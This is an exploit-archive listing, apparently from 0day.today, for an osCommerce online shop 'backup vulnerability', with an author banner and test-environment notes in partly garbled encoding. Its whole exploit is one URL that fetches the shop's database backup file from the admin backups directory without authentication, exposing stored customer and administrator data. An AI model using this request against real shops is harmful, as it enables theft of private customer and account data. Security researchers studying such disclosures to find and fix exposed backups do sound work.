id: 10412
date: 12/26/2009
title: osCommerce online Shop Backup
author: indoushka
cves: 

=============================
osCommerce online Shop Backup
=============================

========================================================================================             $
| # Title    : osCommerce online SHop Backup Vulnerability                                           $
| # Author   : indoushka                                                               |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # Script   : Powered by osCommerce online SHop http://www.oscommerce.com/            |
| # Tested on: windows SP2 Fran&#30902;ais V.(Pnx2 2.0) + Lunix Fran&#30902;ais v.(9.4 Ubuntu)       |
| # Bug      : Backup                                                                  |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1-http://localhost/catalog/admin/backups/db_catalog.sql



#  0day.today [2023-03-24]  #